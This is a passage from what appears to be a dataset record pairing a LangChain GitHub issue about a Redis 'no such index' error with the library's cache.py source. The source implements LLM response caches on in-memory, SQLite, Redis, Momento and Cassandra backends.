text to results text_generations.append(text) return LLMResult( generations=[[Generation(text=text)] for text in text_generations] )
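The `from_model_id` guard above reads `model.is_quantized` and `model.model.is_loaded_in_*` unconditionally, which is exactly what the traceback in this record reports failing on a plain `LlamaForCausalLM`. A hedged sketch of a defensive variant (an illustration of the idea, not necessarily the exact patch that landed in the linked PR):

```python
# Hedged sketch: probe the quantization flags with getattr so models that
# never define them (e.g. a plain LlamaForCausalLM) default to False
# instead of raising AttributeError.
if (
    getattr(model, "is_quantized", False)
    or getattr(model, "is_loaded_in_4bit", False)
    or getattr(model, "is_loaded_in_8bit", False)
) and device is not None:
    logger.warning(
        f"Setting the `device` argument to None from {device} to avoid "
        "moving an already-placed quantized model."
    )
    device = None
```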
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,197
Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"]
### System Info Following the indexing steps from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error: "redis.exceptions.ResponseError: my_docs: no such index". You'll get this exception while using Redis as a retriever: ![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2) ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06) The error is here: ![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece) If you look for the index, you'll get (empty list or set). This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason. I'll try to fix it, but I'm not sure it's possible for me at the moment, so I'm reporting this in the hope it helps. ### Expected behavior Expected behavior inside Redis: "docs:indexname_:12ss2sadd"
https://github.com/langchain-ai/langchain/issues/11197
https://github.com/langchain-ai/langchain/pull/11257
079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a
d5c2ce7c2e1179907400f2c96fc6309a54cbce6a
"2023-09-28T19:57:36Z"
python
"2023-10-24T17:51:25Z"
libs/langchain/langchain/cache.py
""" .. warning:: Beta Feature! **Cache** provides an optional caching layer for LLMs. Cache is useful for two reasons: - It can save you money by reducing the number of API calls you make to the LLM provider if you're often requesting the same completion multiple times. - It can speed up your application by reducing the number of API calls you make to the LLM provider. Cache directly competes with Memory. See documentation for Pros and Cons. **Class hierarchy:** .. code-block:: BaseCache --> <name>Cache # Examples: InMemoryCache, RedisCache, GPTCache """ from __future__ import annotations import hashlib import inspect import json import logging import uuid import warnings from datetime import timedelta from functools import lru_cache from typing import ( TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Type, Union, cast, ) from sqlalchemy import Column, Integer, Row, String, create_engine, select from sqlalchemy.engine.base import Engine from sqlalchemy.orm import Session try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.llms.base import LLM, get_prompts from langchain.load.dump import dumps from langchain.load.load import loads from langchain.schema import ChatGeneration, Generation from langchain.schema.cache import RETURN_VAL_TYPE, BaseCache from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_env from langchain.vectorstores.redis import Redis as RedisVectorstore logger = logging.getLogger(__file__) if TYPE_CHECKING: import momento from cassandra.cluster import Session as CassandraSession def _hash(_input: str) -> str: """Use a deterministic hashing approach.""" return hashlib.md5(_input.encode()).hexdigest() def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str: """Dump generations to json. Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: Json representing a list of generations. Warning: would not work well with arbitrary subclasses of `Generation` """ return json.dumps([generation.dict() for generation in generations]) def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE: """Load generations from json. Args: generations_json (str): A string of json representing a list of generations. Raises: ValueError: Could not decode json string to list of generations. Returns: RETURN_VAL_TYPE: A list of generations. Warning: would not work well with arbitrary subclasses of `Generation` """ try: results = json.loads(generations_json) return [Generation(**generation_dict) for generation_dict in results] except json.JSONDecodeError: raise ValueError( f"Could not decode json to list of generations: {generations_json}" ) def _dumps_generations(generations: RETURN_VAL_TYPE) -> str: """ Serialization for generic RETURN_VAL_TYPE, i.e. sequence of `Generation` Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: a single string representing a list of generations. This function (+ its counterpart `_loads_generations`) rely on the dumps/loads pair with Reviver, so are able to deal with all subclasses of Generation. Each item in the list can be `dumps`ed to a string, then we make the whole list of strings into a json-dumped. """ return json.dumps([dumps(_item) for _item in generations]) def _loads_generations(generations_str: str) -> Union[RETURN_VAL_TYPE, None]: """ Deserialization of a string into a generic RETURN_VAL_TYPE (i.e. a sequence of `Generation`). 
See `_dumps_generations`, the inverse of this function. Args: generations_str (str): A string representing a list of generations. Compatible with the legacy cache-blob format. Does not raise exceptions for malformed entries, just logs a warning and returns None: the caller should be prepared for such a cache miss. Returns: RETURN_VAL_TYPE: A list of generations. """ try: generations = [loads(_item_str) for _item_str in json.loads(generations_str)] return generations except (json.JSONDecodeError, TypeError): # deferring the (soft) handling to after the legacy-format attempt pass try: gen_dicts = json.loads(generations_str) # not relying on `_load_generations_from_json` (which could disappear): generations = [Generation(**generation_dict) for generation_dict in gen_dicts] logger.warning( f"Legacy 'Generation' cached blob encountered: '{generations_str}'" ) return generations except (json.JSONDecodeError, TypeError): logger.warning( f"Malformed/unparsable cached blob encountered: '{generations_str}'" ) return None class InMemoryCache(BaseCache): """Cache that stores things in memory.""" def __init__(self) -> None: """Initialize with empty cache.""" self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {} def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" return self._cache.get((prompt, llm_string), None) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" self._cache[(prompt, llm_string)] = return_val def clear(self, **kwargs: Any) -> None: """Clear cache.""" self._cache = {} Base = declarative_base() class FullLLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_llm_cache" prompt = Column(String, primary_key=True) llm = Column(String, primary_key=True) idx = Column(Integer, primary_key=True) response = Column(String) class SQLAlchemyCache(BaseCache): """Cache that uses SQLAlchemy as a backend.""" def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): """Initialize by creating all tables.""" self.engine = engine self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt == prompt) # type: ignore .where(self.cache_schema.llm == llm_string) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: rows = session.execute(stmt).fetchall() if rows: try: return [loads(row[0]) for row in rows] except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format.
return [Generation(text=row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" items = [ self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.query(self.cache_schema).delete() session.commit() class SQLiteCache(SQLAlchemyCache): """Cache that uses SQLite as a backend.""" def __init__(self, database_path: str = ".langchain.db"): """Initialize by creating the engine and all tables.""" engine = create_engine(f"sqlite:///{database_path}") super().__init__(engine) class UpstashRedisCache(BaseCache): """Cache that uses Upstash Redis as a backend.""" def __init__(self, redis_: Any, *, ttl: Optional[int] = None): """ Initialize an instance of UpstashRedisCache. This method initializes an object with Upstash Redis caching capabilities. It takes a `redis_` parameter, which should be an instance of an Upstash Redis client class, allowing the object to interact with the Upstash Redis server for caching purposes. Parameters: redis_: An instance of Upstash Redis client class (e.g., Redis) used for caching. This allows the object to communicate with the Redis server for caching operations. ttl (int, optional): Time-to-live (TTL) for cached items in seconds. If provided, it sets the time duration for how long cached items will remain valid. If not provided, cached items will not have an automatic expiration. """ try: from upstash_redis import Redis except ImportError: raise ValueError( "Could not import upstash_redis python package. " "Please install it with `pip install upstash_redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Upstash Redis object.") self.redis = redis_ self.ttl = ttl def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "UpstashRedisCache supports caching of normal LLM generations, " f"got {type(gen)}" ) if isinstance(gen, ChatGeneration): warnings.warn( "NOTE: Generation has not been cached. UpstashRedisCache does not" " support caching ChatModel outputs." ) return # Write to a HASH key = self._key(prompt, llm_string) mapping = { str(idx): generation.text for idx, generation in enumerate(return_val) } self.redis.hset(key=key, values=mapping) if self.ttl is not None: self.redis.expire(key, self.ttl) def clear(self, **kwargs: Any) -> None: """ Clear cache. If `asynchronous` is True, flush asynchronously. This flushes the *whole* db.
""" asynchronous = kwargs.get("asynchronous", False) if asynchronous: asynchronous = "ASYNC" else: asynchronous = "SYNC" self.redis.flushdb(flush_type=asynchronous) class RedisCache(BaseCache): """Cache that uses Redis as a backend.""" def __init__(self, redis_: Any, *, ttl: Optional[int] = None): """ Initialize an instance of RedisCache. This method initializes an object with Redis caching capabilities. It takes a `redis_` parameter, which should be an instance of a Redis client class, allowing the object to interact with a Redis server for caching purposes. Parameters: redis_ (Any): An instance of a Redis client class (e.g., redis.Redis) used for caching. This allows the object to communicate with a Redis server for caching operations. ttl (int, optional): Time-to-live (TTL) for cached items in seconds. If provided, it sets the time duration for how long cached items will remain valid. If not provided, cached items will not have an automatic expiration. """ try: from redis import Redis except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Redis object.") self.redis = redis_ self.ttl = ttl def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a Redis HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): try: generations.append(loads(text)) except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) # Write to a Redis HASH key = self._key(prompt, llm_string) with self.redis.pipeline() as pipe: pipe.hset( key, mapping={ str(idx): dumps(generation) for idx, generation in enumerate(return_val) }, ) if self.ttl is not None: pipe.expire(key, self.ttl) pipe.execute() def clear(self, **kwargs: Any) -> None: """Clear cache. If `asynchronous` is True, flush asynchronously.""" asynchronous = kwargs.get("asynchronous", False) self.redis.flushdb(asynchronous=asynchronous, **kwargs) class RedisSemanticCache(BaseCache): """Cache that uses Redis as a vector-store backend.""" # TODO - implement a TTL policy in Redis DEFAULT_SCHEMA = { "content_key": "prompt", "text": [ {"name": "prompt"}, ], "extra": [{"name": "return_val"}, {"name": "llm_string"}], } def __init__( self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2 ): """Initialize by passing in the `init` GPTCache func Args: redis_url (str): URL to connect to Redis. embedding (Embedding): Embedding provider for semantic encoding and search. score_threshold (float, 0.2): Example: .. 
code-block:: python from langchain.globals import set_llm_cache from langchain.cache import RedisSemanticCache from langchain.embeddings import OpenAIEmbeddings set_llm_cache(RedisSemanticCache( redis_url="redis://localhost:6379", embedding=OpenAIEmbeddings() )) """ self._cache_dict: Dict[str, RedisVectorstore] = {} self.redis_url = redis_url self.embedding = embedding self.score_threshold = score_threshold def _index_name(self, llm_string: str) -> str: hashed_index = _hash(llm_string) return f"cache:{hashed_index}" def _get_llm_cache(self, llm_string: str) -> RedisVectorstore: index_name = self._index_name(llm_string) # return vectorstore client for the specific llm string if index_name in self._cache_dict: return self._cache_dict[index_name] # create new vectorstore client for the specific llm string try: self._cache_dict[index_name] = RedisVectorstore.from_existing_index( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, schema=cast(Dict, self.DEFAULT_SCHEMA), ) except ValueError: redis = RedisVectorstore( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, index_schema=cast(Dict, self.DEFAULT_SCHEMA), ) _embedding = self.embedding.embed_query(text="test") redis._create_index(dim=len(_embedding)) self._cache_dict[index_name] = redis return self._cache_dict[index_name] def clear(self, **kwargs: Any) -> None: """Clear semantic cache for a given llm_string.""" index_name = self._index_name(kwargs["llm_string"]) if index_name in self._cache_dict: self._cache_dict[index_name].drop_index( index_name=index_name, delete_documents=True, redis_url=self.redis_url ) del self._cache_dict[index_name] def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" llm_cache = self._get_llm_cache(llm_string) generations: List = [] # Read from a Hash results = llm_cache.similarity_search( query=prompt, k=1, distance_threshold=self.score_threshold, ) if results: for document in results: try: generations.extend(loads(document.metadata["return_val"])) except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. generations.extend( _load_generations_from_json(document.metadata["return_val"]) ) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisSemanticCache only supports caching of " f"normal LLM generations, got {type(gen)}" ) llm_cache = self._get_llm_cache(llm_string) metadata = { "llm_string": llm_string, "prompt": prompt, "return_val": dumps([g for g in return_val]), } llm_cache.add_texts(texts=[prompt], metadatas=[metadata]) class GPTCache(BaseCache): """Cache that uses GPTCache as a backend.""" def __init__( self, init_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = None, ): """Initialize by passing in init function (default: `None`). Args: init_func (Optional[Callable[[Any], None]]): init `GPTCache` function (default: `None`) Example: .. 
code-block:: python # Initialize GPTCache with a custom init function import gptcache from gptcache.processor.pre import get_prompt from gptcache.manager.factory import manager_factory from langchain.globals import set_llm_cache # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: gptcache.Cache, llm: str): cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory( manager="map", data_dir=f"map_cache_{llm}" ), ) set_llm_cache(GPTCache(init_gptcache)) """ try: import gptcache # noqa: F401 except ImportError: raise ImportError( "Could not import gptcache python package. " "Please install it with `pip install gptcache`." ) self.init_gptcache_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = init_func self.gptcache_dict: Dict[str, Any] = {} def _new_gptcache(self, llm_string: str) -> Any: """New gptcache object""" from gptcache import Cache from gptcache.manager.factory import get_data_manager from gptcache.processor.pre import get_prompt _gptcache = Cache() if self.init_gptcache_func is not None: sig = inspect.signature(self.init_gptcache_func) if len(sig.parameters) == 2: self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg] else: self.init_gptcache_func(_gptcache) # type: ignore[call-arg] else: _gptcache.init( pre_embedding_func=get_prompt, data_manager=get_data_manager(data_path=llm_string), ) self.gptcache_dict[llm_string] = _gptcache return _gptcache def _get_gptcache(self, llm_string: str) -> Any: """Get a cache object. When the corresponding llm model cache does not exist, it will be created.""" _gptcache = self.gptcache_dict.get(llm_string, None) if not _gptcache: _gptcache = self._new_gptcache(llm_string) return _gptcache def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up the cache data. First, retrieve the corresponding cache object using the `llm_string` parameter, and then retrieve the data from the cache based on the `prompt`. """ from gptcache.adapter.api import get _gptcache = self._get_gptcache(llm_string) res = get(prompt, cache_obj=_gptcache) if res: return [ Generation(**generation_dict) for generation_dict in json.loads(res) ] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache. First, retrieve the corresponding cache object using the `llm_string` parameter, and then store the `prompt` and `return_val` in the cache object. """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "GPTCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) from gptcache.adapter.api import put _gptcache = self._get_gptcache(llm_string) handled_data = json.dumps([generation.dict() for generation in return_val]) put(prompt, handled_data, cache_obj=_gptcache) return None def clear(self, **kwargs: Any) -> None: """Clear cache.""" from gptcache import Cache for gptcache_instance in self.gptcache_dict.values(): gptcache_instance = cast(Cache, gptcache_instance) gptcache_instance.flush() self.gptcache_dict.clear() def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None: """Create cache if it doesn't exist.
Raises: SdkException: Momento service or network error Exception: Unexpected response """ from momento.responses import CreateCache create_cache_response = cache_client.create_cache(cache_name) if isinstance(create_cache_response, CreateCache.Success) or isinstance( create_cache_response, CreateCache.CacheAlreadyExists ): return None elif isinstance(create_cache_response, CreateCache.Error): raise create_cache_response.inner_exception else: raise Exception(f"Unexpected response cache creation: {create_cache_response}") def _validate_ttl(ttl: Optional[timedelta]) -> None: if ttl is not None and ttl <= timedelta(seconds=0): raise ValueError(f"ttl must be positive but was {ttl}.") class MomentoCache(BaseCache): """Cache that uses Momento as a backend. See https://gomomento.com/""" def __init__( self, cache_client: momento.CacheClient, cache_name: str, *, ttl: Optional[timedelta] = None, ensure_cache_exists: bool = True, ): """Instantiate a prompt cache using Momento as a backend. Note: to instantiate the cache client passed to MomentoCache, you must have a Momento account. See https://gomomento.com/. Args: cache_client (CacheClient): The Momento cache client. cache_name (str): The name of the cache to use to store the data. ttl (Optional[timedelta], optional): The time to live for the cache items. Defaults to None, i.e. use the client default TTL. ensure_cache_exists (bool, optional): Create the cache if it doesn't exist. Defaults to True. Raises: ImportError: Momento python package is not installed. TypeError: cache_client is not of type momento.CacheClient ValueError: ttl is non-null and non-positive """ try: from momento import CacheClient except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if not isinstance(cache_client, CacheClient): raise TypeError("cache_client must be a momento.CacheClient object.") _validate_ttl(ttl) if ensure_cache_exists: _ensure_cache_exists(cache_client, cache_name) self.cache_client = cache_client self.cache_name = cache_name self.ttl = ttl @classmethod def from_client_params( cls, cache_name: str, ttl: timedelta, *, configuration: Optional[momento.config.Configuration] = None, api_key: Optional[str] = None, auth_token: Optional[str] = None, # for backwards compatibility **kwargs: Any, ) -> MomentoCache: """Construct cache from CacheClient parameters.""" try: from momento import CacheClient, Configurations, CredentialProvider except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if configuration is None: configuration = Configurations.Laptop.v1() # Try checking `MOMENTO_AUTH_TOKEN` first for backwards compatibility try: api_key = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN") except ValueError: api_key = api_key or get_from_env("api_key", "MOMENTO_API_KEY") credentials = CredentialProvider.from_string(api_key) cache_client = CacheClient(configuration, credentials, default_ttl=ttl) return cls(cache_client, cache_name, ttl=ttl, **kwargs) def __key(self, prompt: str, llm_string: str) -> str: """Compute cache key from prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Returns: str: The cache key.
""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Lookup llm generations in cache by prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Raises: SdkException: Momento service or network error Returns: Optional[RETURN_VAL_TYPE]: A list of language model generations. """ from momento.responses import CacheGet generations: RETURN_VAL_TYPE = [] get_response = self.cache_client.get( self.cache_name, self.__key(prompt, llm_string) ) if isinstance(get_response, CacheGet.Hit): value = get_response.value_string generations = _load_generations_from_json(value) elif isinstance(get_response, CacheGet.Miss): pass elif isinstance(get_response, CacheGet.Error): raise get_response.inner_exception return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Store llm generations in cache. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model string. return_val (RETURN_VAL_TYPE): A list of language model generations. Raises: SdkException: Momento service or network error Exception: Unexpected response """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "Momento only supports caching of normal LLM generations, " f"got {type(gen)}" ) key = self.__key(prompt, llm_string) value = _dump_generations_to_json(return_val) set_response = self.cache_client.set(self.cache_name, key, value, self.ttl) from momento.responses import CacheSet if isinstance(set_response, CacheSet.Success): pass elif isinstance(set_response, CacheSet.Error): raise set_response.inner_exception else: raise Exception(f"Unexpected response: {set_response}") def clear(self, **kwargs: Any) -> None: """Clear the cache. Raises: SdkException: Momento service or network error """ from momento.responses import CacheFlush flush_response = self.cache_client.flush_cache(self.cache_name) if isinstance(flush_response, CacheFlush.Success): pass elif isinstance(flush_response, CacheFlush.Error): raise flush_response.inner_exception CASSANDRA_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_cache" CASSANDRA_CACHE_DEFAULT_TTL_SECONDS = None class CassandraCache(BaseCache): """ Cache that uses Cassandra / Astra DB as a backend. It uses a single Cassandra table. The lookup keys (which get to form the primary key) are: - prompt, a string - llm_string, a deterministic str representation of the model parameters. (needed to prevent collisions same-prompt-different-model collisions) """ def __init__( self, session: Optional[CassandraSession] = None, keyspace: Optional[str] = None, table_name: str = CASSANDRA_CACHE_DEFAULT_TABLE_NAME, ttl_seconds: Optional[int] = CASSANDRA_CACHE_DEFAULT_TTL_SECONDS, skip_provisioning: bool = False, ): """ Initialize with a ready session and a keyspace name. Args: session (cassandra.cluster.Session): an open Cassandra session keyspace (str): the keyspace to use for storing the cache table_name (str): name of the Cassandra table to use as cache ttl_seconds (optional int): time-to-live for cache entries (default: None, i.e. forever) """ try: from cassio.table import ElasticCassandraTable except (ImportError, ModuleNotFoundError): raise ValueError( "Could not import cassio python package. " "Please install it with `pip install cassio`." 
) self.session = session self.keyspace = keyspace self.table_name = table_name self.ttl_seconds = ttl_seconds self.kv_cache = ElasticCassandraTable( session=self.session, keyspace=self.keyspace, table=self.table_name, keys=["llm_string", "prompt"], primary_key_type=["TEXT", "TEXT"], ttl_seconds=self.ttl_seconds, skip_provisioning=skip_provisioning, ) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" item = self.kv_cache.get( llm_string=_hash(llm_string), prompt=_hash(prompt), ) if item is not None: generations = _loads_generations(item["body_blob"]) # this protects against malformed cached items: if generations is not None: return generations else: return None else: return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" blob = _dumps_generations(return_val) self.kv_cache.put( llm_string=_hash(llm_string), prompt=_hash(prompt), body_blob=blob, ) def delete_through_llm( self, prompt: str, llm: LLM, stop: Optional[List[str]] = None ) -> None: """ A wrapper around `delete` with the LLM being passed. In case the llm(prompt) calls have a `stop` param, you should pass it here """ llm_string = get_prompts( {**llm.dict(), **{"stop": stop}}, [], )[1] return self.delete(prompt, llm_string=llm_string) def delete(self, prompt: str, llm_string: str) -> None: """Evict from cache if there's an entry.""" return self.kv_cache.delete( llm_string=_hash(llm_string), prompt=_hash(prompt), ) def clear(self, **kwargs: Any) -> None: """Clear cache. This is for all LLMs at once.""" self.kv_cache.clear() CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC = "dot" CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD = 0.85 CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_semantic_cache" CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS = None CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE = 16 class CassandraSemanticCache(BaseCache): """ Cache that uses Cassandra as a vector-store backend for semantic (i.e. similarity-based) lookup. It uses a single (vector) Cassandra table and stores, in principle, cached values from several LLMs, so the LLM's llm_string is part of the rows' primary keys. The similarity is based on one of several distance metrics (default: "dot"). If choosing another metric, the default threshold is to be re-tuned accordingly. """ def __init__( self, session: Optional[CassandraSession], keyspace: Optional[str], embedding: Embeddings, table_name: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME, distance_metric: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC, score_threshold: float = CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD, ttl_seconds: Optional[int] = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS, skip_provisioning: bool = False, ): """ Initialize the cache with all relevant parameters. Args: session (cassandra.cluster.Session): an open Cassandra session keyspace (str): the keyspace to use for storing the cache embedding (Embedding): Embedding provider for semantic encoding and search. table_name (str): name of the Cassandra (vector) table to use as cache distance_metric (str, 'dot'): which measure to adopt for similarity searches score_threshold (optional float): numeric value to use as cutoff for the similarity searches ttl_seconds (optional int): time-to-live for cache entries (default: None, i.e. forever) The default score threshold is tuned to the default metric. 
Tune it carefully yourself if switching to another distance metric. """ try: from cassio.table import MetadataVectorCassandraTable except (ImportError, ModuleNotFoundError): raise ValueError( "Could not import cassio python package. " "Please install it with `pip install cassio`." ) self.session = session self.keyspace = keyspace self.embedding = embedding self.table_name = table_name self.distance_metric = distance_metric self.score_threshold = score_threshold self.ttl_seconds = ttl_seconds # The contract for this class has separate lookup and update: # in order to spare some embedding calculations we cache them between # the two calls. # Note: each instance of this class has its own `_get_embedding` with # its own lru. @lru_cache(maxsize=CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE) def _cache_embedding(text: str) -> List[float]: return self.embedding.embed_query(text=text) self._get_embedding = _cache_embedding self.embedding_dimension = self._get_embedding_dimension() self.table = MetadataVectorCassandraTable( session=self.session, keyspace=self.keyspace, table=self.table_name, primary_key_type=["TEXT"], vector_dimension=self.embedding_dimension, ttl_seconds=self.ttl_seconds, metadata_indexing=("allow", {"_llm_string_hash"}), skip_provisioning=skip_provisioning, ) def _get_embedding_dimension(self) -> int: return len(self._get_embedding(text="This is a sample sentence.")) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" embedding_vector = self._get_embedding(text=prompt) llm_string_hash = _hash(llm_string) body = _dumps_generations(return_val) metadata = { "_prompt": prompt, "_llm_string_hash": llm_string_hash, } row_id = f"{_hash(prompt)}-{llm_string_hash}" # self.table.put( body_blob=body, vector=embedding_vector, row_id=row_id, metadata=metadata, ) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" hit_with_id = self.lookup_with_id(prompt, llm_string) if hit_with_id is not None: return hit_with_id[1] else: return None def lookup_with_id( self, prompt: str, llm_string: str ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]: """ Look up based on prompt and llm_string. If there are hits, return (document_id, cached_entry) """ prompt_embedding: List[float] = self._get_embedding(text=prompt) hits = list( self.table.metric_ann_search( vector=prompt_embedding, metadata={"_llm_string_hash": _hash(llm_string)}, n=1, metric=self.distance_metric, metric_threshold=self.score_threshold, ) ) if hits: hit = hits[0] generations = _loads_generations(hit["body_blob"]) if generations is not None: # this protects against malformed cached items: return ( hit["row_id"], generations, ) else: return None else: return None def lookup_with_id_through_llm( self, prompt: str, llm: LLM, stop: Optional[List[str]] = None ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]: llm_string = get_prompts( {**llm.dict(), **{"stop": stop}}, [], )[1] return self.lookup_with_id(prompt, llm_string=llm_string) def delete_by_document_id(self, document_id: str) -> None: """ Given this is a "similarity search" cache, an invalidation pattern that makes sense is first a lookup to get an ID, and then deleting with that ID. This is for the second step. 
